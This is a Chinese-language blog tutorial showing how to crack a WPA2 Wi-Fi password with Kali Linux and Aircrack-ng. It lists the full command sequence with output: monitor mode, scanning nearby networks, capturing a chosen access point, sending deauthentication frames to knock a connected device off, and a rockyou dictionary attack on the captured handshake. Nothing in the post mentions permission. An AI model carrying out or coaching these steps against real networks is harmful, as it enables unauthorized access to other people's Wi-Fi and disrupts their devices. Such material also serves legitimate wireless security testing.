zoukankan      html  css  js  c++  java
  • Kali 使用Aircrack-ng破解简单wifi密码

    硬件使用支持Monitor的USB无线网卡。Kali可以使用虚拟机,官网有直接可以下载打开的虚拟机镜像,即开即用。

      正常情况下使用ifconfig 就可以看到识别到的网卡wlan0了。

    使用iwconfig命令可以查看当前的网卡信息。

    进入monitor模式:airmon-ng start wlan0

    运行iwconfig可以看到网卡进入了monitor模式:

    root@kali:~# iwconfig

    wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=20 dBm   
              Retry short  long limit:2   RTS thr:off   Fragment thr:off
              Power Management:off
              
    eth0      no wireless extensions.
    
    lo        no wireless extensions.

     使用airodump-ng wlan0mon命令查看当前网卡所检测到的无线信息。运行这个命令后选择一个路由进行破解,记住其的BSSID与CH信息。

     CH  9 ][ Elapsed: 1 min ][ 2017-12-08 01:32                                         
                                                                                                          
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                          
     44:D1:FA:08:B9:60  -10       27        3    0  13  54e  WPA2 CCMP   PSK  Wireless 2.4G_08B960        
     80:89:17:7F:90:E2  -15       24       12    0   1  54e. WPA2 CCMP   PSK  yyyy                        
     00:0C:43:10:4E:15  -18       30        0    0   9  54e. WPA2 CCMP   PSK  w-AP                        
     EC:3D:FD:C9:86:6A  -20       27        8    0   3  54e  WPA2 CCMP   PSK  <length:  0>                
     B8:3A:08:62:10:F9  -23       20        0    0   6  54e  WPA2 CCMP   PSK  NOVA_10E8                   
     B0:D5:9D:20:BB:05  -26       10        0    0   1  54e. WPA2 CCMP   PSK  ss                          
     B8:3A:08:62:10:E9  -28       20        0    0   6  54e  WPA2 CCMP   PSK  NOVA_10E8                   
     94:8B:03:FE:01:C0  -28       20        0    0   7  54e  OPN              CYWiFi-01C0                 
     96:8B:03:FA:01:C0  -28       27        0    0   7  54e  OPN               �..费��.�.��.�享WiFi       
     78:A3:51:32:3B:BC  -29       25        0    0  13  54e  OPN              2.4000000000000000000        
     00:AA:BB:59:00:13  -29       22        0    0   7  54e. OPN              000-p59-0013                
     78:D3:8D:F7:E8:95  -29       24        0    0   6  54e. WPA2 CCMP   PSK  Tozed-test1                 
     D8:D8:66:03:E4:6E  -32       10        0    0  11  54e. OPN              Tozed-2.4G                   
     D8:D8:66:03:E4:7A  -33        6        0    0  11  54e. OPN              Tozed-2.4G                  
     00:03:7F:33:27:4F  -34       60        0    0   8  54e. WPA2 CCMP   PSK  tozed-33274F                 
     00:E0:4C:14:0F:DE  -36       14        0    0   6  54e  WPA2 CCMP   PSK  FWT_140FDE                  
     34:96:72:43:8E:CE  -37       22        0    0  11  54e. WPA2 CCMP   PSK  TP-LINK_8ECE  

     其中乱码的是中文SSID。

    使用命令对指定的SSID进行抓包:

    airodump-ng wlan0mon --bssid 00:0C:43:10:4E:15 -c 9 -w ap4e15

    其中--bssid 为指定bssid,-c 指定信道。-w 指定抓取后生成的文件,这个文件会以ap4e15开头。

    CH  9 ][ Elapsed: 36 s ][ 2017-12-08 01:41 ][ WPA handshake: 00:0C:43:10:4E:15                       
                                                                                                          
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                          
     00:0C:43:10:4E:15  -15   0      367      560    4   9  54e. WPA2 CCMP   PSK  w-AP                    
                                                                                                          
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                            
                                                                                                          
     00:0C:43:10:4E:15  F8:23:B2:A2:B1:0C  -25    0e-24e   975      691  
    可以看到有一台 F8:23:B2:A2:B1:0C 。设备连接到了该ap

     保持以上的命令运行,新开一个终端运行命令使其重新建立连接,这样我们就能抓取到四步握手的信息了。

    root@kali:~# aireplay-ng -0 2 -a 00:0C:43:10:4E:15 -c F8:23:B2:A2:B1:0C wlan0mon

    01:46:41  Waiting for beacon frame (BSSID: 00:0C:43:10:4E:15) on channel 9
    01:46:42  Sending 64 directed DeAuth. STMAC: [F8:23:B2:A2:B1:0C] [61|62 ACKs]
    01:46:42  Sending 64 directed DeAuth. STMAC: [F8:23:B2:A2:B1:0C] [59|60 ACKs]

    这个时候该设备应该会重新连接了。可以取消抓包。

    root@kali:~# ls ap4e15*

    ap4e15-01.cap  ap4e15-01.kismet.csv     ap4e15-02.cap  ap4e15-02.kismet.csv
    ap4e15-01.csv  ap4e15-01.kismet.netxml  ap4e15-02.csv  ap4e15-02.kismet.netxml
    

    以上的名字,是抓包时候-w参数后设置的。这几种不同的格式,如果需要分析则可以使用.cap的文件,用wireshark可以打开分析。

    然后使用Kali的默认字典进行破解,目录在/usr/share/wordlists/rockyou.txt.gz,进入该目录,使用gunzip rockyou.txt.gz解压。其它字典位置可以自己去研究。

    aircrack-ng -w /usr/share/wordlists/rockyou.txt ap4e15-01.cap

    可能破解会成功 也会失败,简单的就很容易了 复杂的 ,字典包里面没有那就不行了。

  • 相关阅读:
    异常处理
    添加headers头文件反爬虫
    爬百思不得姐的视频(爬多页时for的循环)
    图片爬取百思不得姐(正则的取法,下载的方法,%s的用法)
    创建一个网页
    集合幂级数总结
    题解(新)
    JOI汉堡肉
    NOIO 2020 r2 总结
    长链剖分
  • 原文地址:https://www.cnblogs.com/fogcell/p/8005619.html
Copyright © 2011-2022 走看看